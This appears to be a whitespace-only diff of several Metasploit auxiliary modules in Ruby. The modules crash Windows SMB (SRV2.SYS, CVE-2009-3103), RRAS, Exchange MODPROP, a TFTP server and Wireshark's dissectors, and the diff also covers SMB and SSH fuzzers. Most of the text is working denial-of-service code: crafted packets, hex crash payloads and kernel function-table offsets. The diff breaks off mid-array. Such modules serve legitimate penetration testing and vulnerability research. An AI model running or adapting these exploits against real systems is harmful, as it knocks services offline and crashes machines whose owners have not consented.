# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -15,7 +15,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',
'Description' => %q{
This module exploits an out of bounds function table dereference in the SMB
@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary
'Author' => [ 'laurent.gaffie[at]gmail.com', 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
'References' =>
[
['CVE', '2009-3103'],
['BID', '36299'],
@ -41,13 +41,13 @@ class Metasploit3 < Msf::Auxiliary
Opt::RPORT(445),
OptInt.new('OFFSET', [true, 'The function table offset to call', 0xffff])
], self.class)
end
def run
connect()
# The SMB 2 dialect must be there
dialects = ['PC NETWORK PROGRAM 1.0', 'LANMAN1.0', 'Windows for Workgroups 3.1a', 'LM1.2X002', 'LANMAN2.1', 'NT LM 0.12', 'SMB 2.002']
data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('')
@ -65,13 +65,13 @@ class Metasploit3 < Msf::Auxiliary
print_status("Sending request and waiting for a reply...")
sock.put(pkt.to_s)
r = sock.get_once
if(not r)
print_status("The target system has likely crashed")
else
print_status("Response received: #{r.inspect}")
end
disconnect()
end
@ -95,11 +95,11 @@ end
0x76 = ExAllocatePoolWithTag
0x77 = ExFreePool
0x86 = ExAllocatePoolWithTag
0x87 = ExFreePoo
0x87 = ExFreePoo
0x96 = ExAllocatePoolWithTag
0x97 = ExFreePoo
0x97 = ExFreePoo
0xa6 = ExAllocatePoolWithTag
0xa7 = ExFreePoo
0xa7 = ExFreePoo
0xb9 = BugCheckEx
0xc7 = SrvBalanceCredits
0xdf = SrvNetStatistics data
@ -114,10 +114,10 @@ end
0x0179 = SrvProcessOplockBreakTimer
0x0185 = L"XactSrv"
0x01f8 = WppTraceCallback
Offsets on Vista SP1 (no updates) x86:
0x64 = mov esp, ebp; pop ebp, ret
0xde = pool with tag
@ -154,6 +154,6 @@ end
734 -> 802015ff - ffde03f078f8ff7f7c02f8ff3ffe01fe
760 -> 99b4ff28 - 8bff558bec6a00ff7514ff7510ff750c
804 -> 830ffc7d - 0000001722268b3e012004020010c01c
=end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -22,54 +22,54 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info,
'Name' => 'Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference',
'Description' => %q{
This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing
an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD.
This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing
an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD.
Effecting Vista SP1/SP2 (And possibly Server 2008 SP1/SP2), the flaw was resolved with MS09-050.
},
'Author' => [ 'sf' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
'References' =>
[
[ 'CVE', '2009-3103'],
[ 'OSVDB', '57799' ],
[ 'MSB', 'MS09-050' ],
]
))
register_options( [ Opt::RPORT( 445 ) ], self.class )
end
def run
print_status( "Targeting host #{datastore['RHOST']}:#{datastore['RPORT']}..." )
connect
dialects = [ "AAAA" + [ 0xDEADC0DE ].pack( "V" ) + [ 0xCAFEF00D ].pack( "V" ), "SMB 2.002" ]
data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join( '' )
data += "A" * 128
packet = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct
packet['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE
packet['Payload']['SMB'].v['Flags1'] = 0x18
packet['Payload']['SMB'].v['Flags2'] = 0xC853
packet['Payload']['SMB'].v['ProcessIDHigh'] = Rex::Proto::SMB::Constants::SMB2_OP_LOGOFF
packet['Payload'].v['Payload'] = data
packet = packet.to_s
print_status( "Sending the exploit packet (#{packet.length} bytes)..." )
sock.put( packet )
response = sock.get_once
if( not response )
print_status( "No response. The target system has probably crashed." )
else
print_status( "Response received. The target system is not vulnerable:\n#{response.inspect}" )
end
disconnect
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -21,15 +21,15 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference',
'Description' => %q{
This module triggers a NULL dereference in svchost.exe on
all current versions of Windows that run the RRAS service. This
all current versions of Windows that run the RRAS service. This
service is only accessible without authentication on Windows XP
SP1 (using the SRVSVC pipe).
SP1 (using the SRVSVC pipe).
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
@ -44,18 +44,18 @@ class Metasploit3 < Msf::Auxiliary
'DefaultAction' => 'Attack',
'DisclosureDate' => 'Jun 14 2006'
))
register_options(
[
OptString.new('SMBPIPE', [ true, "The pipe name to use (ROUTER, SRVSVC)", 'ROUTER']),
], self.class)
end
def run
connect
smb_login
case action.name
when 'Attack'
@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
stb = [0, 0, 0, 0].pack('V*')
print_status("Calling the vulnerable function...")
begin
dcerpc.call(0x0C, stb)
@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary
raise e
end
end
end
disconnect

View File

@ -1,10 +1,9 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -16,19 +15,19 @@ class Metasploit3 < Msf::Auxiliary
include Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Microsoft Vista SP0 SMB Negotiate Protocol DoS',
'Description' => %q{
This module exploits a flaw in Windows Vista that allows a remote
unauthenticated attacker to disable the SMB service. This vulnerability
was silently fixed in Microsoft Vista Service Pack 1.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
))
register_options([Opt::RPORT(445)], self.class)
end
@ -38,11 +37,11 @@ class Metasploit3 < Msf::Auxiliary
# 100 requests ensure that the bug is reliably hit
1.upto(100) do |i|
begin
connect
# 118 dialects are needed to trigger a non-response
dialects = ['NT LM 0.12'] * 118
@ -59,16 +58,16 @@ class Metasploit3 < Msf::Auxiliary
sock.put(pkt.to_s)
disconnect
rescue ::Interrupt
raise $!
rescue ::Exception
print_status("Error at iteration #{i}: #{$!.class} #{$!}")
return
end
end
end
end
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -17,9 +17,9 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Smtp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'MS06-019 Exchange MODPROP Heap Overflow',
'Description' => %q{
This module triggers a heap overflow vulnerability in MS
@ -42,23 +42,23 @@ class Metasploit3 < Msf::Auxiliary
[
OptString.new('SUBJECT', [ true, 'The subject of the e-mail', 're: Your Brains'])
], self.class)
end
#
# This needs some reworking to use the SMTPDeliver mixin and the Re::MIME class
#
def run
connect_login
modprops = ['attendee', 'categories', 'class', 'created', 'description',
'dtstamp', 'duration', 'last-modified',
modprops = ['attendee', 'categories', 'class', 'created', 'description',
'dtstamp', 'duration', 'last-modified',
'location', 'organizer', 'priority', 'recurrence-id', 'sequence',
'status', 'summary', 'transp', 'uid']
#modprops = ['dtstamp']
modpropshort = ""
modpropbusted = ""
modnum = rand(3)
@ -79,14 +79,14 @@ class Metasploit3 < Msf::Auxiliary
boundry = Rex::Text.rand_text_alphanumeric(8) + "." + Rex::Text.rand_text_alphanumeric(8)
# Really, the randomization above only crashes /sometimes/ - it's MUCH more
# reliable, and gives crashes in better spots of you use these modprops:
modpropshort = "dtstamp,"
modproplong = "dtstamp, dtstamp,"
modpropbusted = "DTSTAMP:\r\n"
mail = "From: #{datastore['MAILFROM']}\r\n"
mail << "To: #{datastore['MAILTO']}\r\n"
mail << "Subject: #{datastore['SUBJECT']}\r\n"
@ -111,12 +111,12 @@ class Metasploit3 < Msf::Auxiliary
mail << "END:VCALENDAR\r\n"
mail << "\r\n--#{boundry}\r\n"
mail << "\r\n.\r\n"
print_status("Sending message...")
print_status("Sending message...")
sock.put(mail)
sock.put("QUIT\r\n")
print "<< " + sock.get_once
print "<< " + sock.get_once
disconnect
end

View File

@ -3,10 +3,10 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# http://metasploit.com/framework/
##
require 'msf/core'
@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'PacketTrap TFTP Server 2.2.5459.0 DoS',
'Description' => %q{
The PacketTrap TFTP server version 2.2.5459.0 can be

View File

@ -1,5 +1,9 @@
##
# This file is part of the Metasploit Framework and may be subject to
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -12,9 +16,9 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Capture
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Wireshark chunked_encoding_dissector function DOS',
'Description' => %q{
Wireshark crash when dissecting an HTTP chunked response.
@ -28,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1394'],
],
'DisclosureDate' => 'February 22 2007'))
register_options([
OptInt.new('SPORT', [true, 'The source port used to send the malicious HTTP response', 80]),
OptAddress.new('SHOST', [false, 'This option can be used to specify a spoofed source address', nil])
@ -50,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary
n.l3.protocol = 6
n.l3.id = rand(0x10000)
n.l3.ttl = 64
n.l4 = Racket::L4::TCP.new
n.l4.dst_port = rand(65535)+1
n.l4.seq = rand(0x100000000)
@ -60,11 +64,11 @@ class Metasploit3 < Msf::Auxiliary
n.l4.src_port = datastore['SPORT'].to_i
n.l4.window = 3072
n.l4.payload = "\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x33\x30\x32\x20\x46\x6f\x75\x6e\x64\x0d\x0a\x44\x61\x74\x65\x3a\x20\x54\x68\x75\x2c\x20\x32\x32\x20\x46\x65\x62\x20\x32\x30\x30\x37\x20\x32\x31\x3a\x35\x39\x3a\x30\x33\x20\x47\x4d\x54\x0d\x0a\x53\x65\x72\x76\x65\x72\x3a\x20\x41\x70\x61\x63\x68\x65\x2f\x31\x2e\x33\x2e\x33\x37\x20\x28\x55\x6e\x69\x78\x29\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x20\x6d\x6f\x64\x5f\x74\x68\x72\x6f\x74\x74\x6c\x65\x2f\x33\x2e\x31\x2e\x32\x20\x6d\x6f\x64\x5f\x70\x73\x6f\x66\x74\x5f\x74\x72\x61\x66\x66\x69\x63\x2f\x30\x2e\x31\x20\x6d\x6f\x64\x5f\x73\x73\x6c\x2f\x32\x2e\x38\x2e\x32\x38\x20\x4f\x70\x65\x6e\x53\x53\x4c\x2f\x30\x2e\x39\x2e\x36\x62\x20\x46\x72\x6f\x6e\x74\x50\x61\x67\x65\x2f\x35\x2e\x30\x2e\x32\x2e\x32\x36\x33\x35\x0d\x0a\x58\x2d\x50\x6f\x77\x65\x72\x65\x64\x2d\x42\x79\x3a\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x0d\x0a\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x0d\x0a\x50\x33\x50\x3a\x20\x70\x6f\x6c\x69\x63\x79\x72\x65\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x77\x33\x63\x2f\x70\x33\x70\x2e\x78\x6d\x6c\x22\x2c\x20\x43\x50\x3d\x22\x4e\x4f\x49\x20\x44\x53\x50\x20\x43\x4f\x52\x20\x4e\x49\x44\x20\x41\x44\x4d\x20\x44\x45\x56\x20\x50\x53\x41\x20\x4f\x55\x52\x20\x49\x4e\x44\x20\x55\x4e\x49\x20\x50\x55\x52\x20\x43\x4f\x4d\x20\x4e\x41\x56\x20\x49\x4e\x54\x20\x53\x54\x41\x22\x0d\x0a\x45\x78\x70\x69\x72\x65\x73\x3a\x20\x54\x68\x75\x2c\x20\x31\x39\x20\x4e\x6f\x76\x20\x31\x39\x38\x31\x20\x30\x38\x3a\x35\x32\x3a\x30\x30\x20\x47\x4d\x54\x0d\x0a\x50\x72\x61\x67\x6d\x61\x3a\x20\x6e\x6f\x2d\x63\x61\x63\x68\x65\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x61\x74\x74\x61\x63\x68\x6d\x65\x6e\x74\x3b\x20\x66\x69\x6c\x65\x6e\x61\x6d\x65\x3d\x53\x74\x61\x74\x43\x6f\x75\x6e\x74\x65\x72\x2d\x4c\x6f\x67\x2d\x32\x32\x38\x37\x35\x39\x32\x2e\x63\x73\x76\x0d\x0a\x53\x65\x74\x2d\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x50\x48\x50\x53\x45\x53\x53\x49\x44\x3d\x64\x37\x35\x65\x64\x39\x37\x36\x66\x30\x30\x39\x64\x61\x31\x31\x38\x65\x62\x36\x31\x34\x62\x39\x38\x66\x64\x35\x62\x39\x31\x36\x25\x33\x42\x2b\x70\x61\x74\x68\x25\x33\x44\x25\x32\x46\x0d\x0a\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x3a\x20\x74\x69\x6d\x65\x6f\x75\x74\x3d\x31\x35\x2c\x20\x6d\x61\x78\x3d\x31\x30\x30\x0d\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x54\x72\x61\x6e\x73\x66\x65\x72\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x63\x68\x75\x6e\x6b\x65\x64\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d\x0d\x0a\x0d\x0a\x30\x0d\x0a\x0d\x0a"
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
pkt = n.pack
capture_sendto(pkt, rhost)
close_pcap

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Capture
include Msf::Auxiliary::Dos
def initialize
super(
'Name' => 'Wireshark LDAP dissector DOS',
@ -31,13 +31,13 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'CVE', '2008-1562' ],
],
'DisclosureDate' => 'Mar 28 2008')
'DisclosureDate' => 'Mar 28 2008')
register_options([
OptInt.new('RPORT', [true, 'The destination port', 389]),
OptAddress.new('SHOST', [false, 'This option can be used to specify a spoofed source address', nil])
], self.class)
deregister_options('FILTER','PCAPFILE')
end
@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("Sending malformed LDAP packet to #{rhost}")
m = Rex::Text.rand_text_alpha_lower(3)
open_pcap
n = Racket::Racket.new
@ -57,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary
n.l3.protocol = 6
n.l3.id = rand(0x10000)
n.l3.ttl = 64
n.l4 = Racket::L4::TCP.new
n.l4.src_port = rand(65535)+1
n.l4.seq = rand(0x100000000)
@ -68,8 +68,8 @@ class Metasploit3 < Msf::Auxiliary
n.l4.window = 3072
n.l4.payload = "0O\002\002;\242cI\004\rdc=#{m},dc=#{m}\n\001\002\n\001\000\002\001\000\002\001\000\001\001\000\241'\243\016"
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
pkt = n.pack
capture_sendto(pkt, rhost)

View File

@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::SMB
include Msf::Auxiliary::Fuzzer
def initialize(info = {})
super(update_info(info,
'Name' => 'SMB Tree Connect Request Fuzzer',
@ -29,35 +29,35 @@ class Metasploit3 < Msf::Auxiliary
'Version' => '$Revision$'
))
end
def do_smb_connect(pkt,opts={})
@connected = false
connect
simple.login(
datastore['SMBName'],
datastore['SMBName'],
datastore['SMBUser'],
datastore['SMBPass'],
datastore['SMBDomain']
)
)
@connected = true
simple.connect("\\\\#{datastore['RHOST']}\\#{pkt}")
end
def run
last_str = nil
last_inp = nil
last_err = nil
cnt = 0
fuzz_strings do |str|
cnt += 1
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
end
begin
do_smb_connect(str, 0.25)
rescue ::Interrupt
@ -68,16 +68,16 @@ class Metasploit3 < Msf::Auxiliary
ensure
disconnect
end
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
print_status("Could not connect to the service: #{last_err}")
print_status("Could not connect to the service: #{last_err}")
end
return
end
last_str = str
last_inp = @last_fuzzer_input
end

View File

@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::SMB
include Msf::Auxiliary::Fuzzer
def initialize(info = {})
super(update_info(info,
'Name' => 'SMB Tree Connect Request Corruption',
@ -32,48 +32,48 @@ class Metasploit3 < Msf::Auxiliary
OptString.new('SMBTREE', [true, 'Specify the tree name to corrupt', "\\\\SERVER\\IPC$"])
], self.class)
end
def do_smb_tree(pkt,opts={})
@connected = false
connect
simple.login(
datastore['SMBName'],
datastore['SMBName'],
datastore['SMBUser'],
datastore['SMBPass'],
datastore['SMBDomain']
)
@connected = true
sock.put(pkt)
sock.get_once(-1, opts[:timeout])
end
def run
# Connect in order to get the server-assigned user-id
connect
smb_login
pkt = make_smb_tree
disconnect
last_str = nil
last_inp = nil
last_err = nil
cnt = 0
max = datastore['MAXDEPTH'].to_i
max = nil if max == 0
tot = ( max ? [max,pkt.length].min : pkt.length) * 256
print_status("Fuzzing SMB tree connect with #{tot} requests")
fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
cnt += 1
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
end
begin
r = do_smb_tree(str, 0.25)
rescue ::Interrupt
@ -84,29 +84,29 @@ class Metasploit3 < Msf::Auxiliary
ensure
disconnect
end
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
print_status("Could not connect to the service: #{last_err}")
print_status("Could not connect to the service: #{last_err}")
end
return
end
last_str = str
last_inp = @last_fuzzer_input
end
end
def make_smb_tree
share = datastore['SMBTREE']
pass = ''
data = [ pass, share, '?????' ].collect{ |a| a + "\x00" }.join('');
pkt = Rex::Proto::SMB::Constants::SMB_TREE_CONN_PKT.make_struct
simple.client.smb_defaults(pkt['Payload']['SMB'])
pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TREE_CONNECT_ANDX
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0x2001

View File

@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Fuzzer
def initialize(info = {})
super(update_info(info,
'Name' => 'SSH Key Exchange Init Corruption',
@ -32,40 +32,40 @@ class Metasploit3 < Msf::Auxiliary
OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test'])
], self.class)
end
def do_ssh_kexinit(pkt,opts={})
@connected = false
connect
@connected = true
@banner = sock.get_once(-1,opts[:banner_timeout])
return if not @banner
sock.put("SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1\r\n")
sock.put(pkt)
sock.get_once(-1,opts[:kex_timeout])
end
def run
last_str = nil
last_inp = nil
last_err = nil
pkt = make_kex_init
cnt = 0
max = datastore['MAXDEPTH'].to_i
max = nil if max == 0
tot = ( max ? [max,pkt.length].min : pkt.length) * 256
print_status("Fuzzing SSH initial key exchange with #{tot} requests")
fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
cnt += 1
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
end
begin
r = do_ssh_kexinit(str,:banner_timeout => 5, :kex_timeout => 0.5)
rescue ::Interrupt
@ -76,16 +76,16 @@ class Metasploit3 < Msf::Auxiliary
ensure
disconnect
end
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
print_status("Could not connect to the service: #{last_err}")
print_status("Could not connect to the service: #{last_err}")
end
return
end
if(not @banner)
print_status("The service may have crashed (no banner): iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} ")
return
@ -95,106 +95,106 @@ class Metasploit3 < Msf::Auxiliary
last_inp = @last_fuzzer_input
end
end
def make_kex_init
[0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f,
0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7,
0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00,
0x00, 0x7e, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65,
0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e,
0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x2d, 0x65,
0x78, 0x63, 0x68, 0x61, 0x6e, 0x67, 0x65, 0x2d,
0x73, 0x68, 0x61, 0x32, 0x35, 0x36, 0x2c, 0x64,
0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65,
0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72,
0x6f, 0x75, 0x70, 0x2d, 0x65, 0x78, 0x63, 0x68,
0x61, 0x6e, 0x67, 0x65, 0x2d, 0x73, 0x68, 0x61,
0x31, 0x2c, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65,
0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e,
0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x31, 0x34,
0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x64, 0x69,
0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c,
0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f,
0x75, 0x70, 0x31, 0x2d, 0x73, 0x68, 0x61, 0x31,
0x00, 0x00, 0x00, 0x0f, 0x73, 0x73, 0x68, 0x2d,
0x72, 0x73, 0x61, 0x2c, 0x73, 0x73, 0x68, 0x2d,
0x64, 0x73, 0x73, 0x00, 0x00, 0x00, 0x9d, 0x61,
0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62,
0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d, 0x63,
0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77, 0x66,
0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63, 0x2c,
0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38, 0x2d,
0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63, 0x66,
0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c, 0x61,
0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32, 0x35,
0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75,
0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32,
0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65, 0x73,
0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63, 0x2c,
0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65, 0x6c,
0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79, 0x73,
0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69, 0x75,
0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73, 0x31,
0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61,
0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x74,
0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36,
0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00, 0x9d,
0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63,
0x62, 0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d,
0x63, 0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77,
0x66, 0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63,
0x2c, 0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38,
0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63,
0x66, 0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c,
0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32,
0x35, 0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f,
0x75, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39,
0x32, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65,
0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63,
0x2c, 0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65,
0x6c, 0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79,
0x73, 0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69,
0x75, 0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73,
0x31, 0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c,
0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63,
0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35,
0x36, 0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00,
0x69, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64,
0x35, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73,
0x68, 0x61, 0x31, 0x2c, 0x75, 0x6d, 0x61, 0x63,
0x2d, 0x36, 0x34, 0x40, 0x6f, 0x70, 0x65, 0x6e,
0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c,
0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70,
0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x2c, 0x68,
0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65,
0x6d, 0x64, 0x31, 0x36, 0x30, 0x40, 0x6f, 0x70,
0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f,
0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73,
0x68, 0x61, 0x31, 0x2d, 0x39, 0x36, 0x2c, 0x68,
0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2d,
0x39, 0x36, 0x00, 0x00, 0x00, 0x69, 0x68, 0x6d,
0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2c, 0x68,
0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31,
0x2c, 0x75, 0x6d, 0x61, 0x63, 0x2d, 0x36, 0x34,
0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68,
0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61,
